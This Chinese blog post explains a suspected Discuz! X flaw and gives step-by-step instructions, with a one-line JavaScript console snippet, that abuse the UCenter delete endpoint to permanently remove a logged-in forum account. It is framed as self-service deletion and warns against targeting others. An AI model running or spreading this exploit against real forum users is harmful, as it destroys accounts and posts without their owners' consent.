昨天,Twitter网友Coxxs公布了疑似Discuz! X 论坛的漏洞,通过调用网页控制台Console键入特定代码,执行代码后会先删除UCenter 内的帐号,随后UCenter 会通知 Discuz! 删除用户帐号。坚果在第一时间对该漏洞进行验证,并成功删除了在某锋手机论坛的账号!坚果制作了一个简单的教程,有需要的小伙伴可以参考一下,坚果郑重提醒大家,此操作没有后悔药,请三思而后行!

疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

警告

  • 此操作没有后悔药,谨慎操作!
  • 可能同时删除账号和该账号的帖子,也可能只删除账号,不可控!
  • 禁止对他人的账号执行此操作!

教程

 ▼ 进入欲删除账号的网站,登陆欲删除的账号

疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

 ▼ 按F12打开控制台,点击「Console」,为了分便操作,先清空控制台,点击左上角‘禁止’按钮清空

疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

 ▼ 复制以下代码到Console中,按下Enter键执行代码


location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的ID?'))?d:'';


疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

 ▼ 弹出对话框,点击「确定

*.部分浏览器可能会拦截对话框,请查看地址栏处是否有对话框被拦截

疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

 ▼ 返回一个大于0的整数,删除账号成功,尝试登陆,失败

疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客
疑似漏洞,永久删除你在任何Discuz! X论坛的帐号!-坚果极客

说明

  • 此操作是删除的是 UCenter 内的帐号,UCenter 会通知 Discuz! 删除用户帐号
  • 通知可能出现延迟,或不成功。因此可能不会立即登出网站
  • 如果通知最终成功,该帐号及其所有帖子都会从 Discuz! 中删除
  • 如果通知不成功,帐号登出后也将无法登录。此时可以注册一个新的同名帐号,覆盖原帐号。原帐号信息将被删除,其帖子将无法阅读(但不会删除)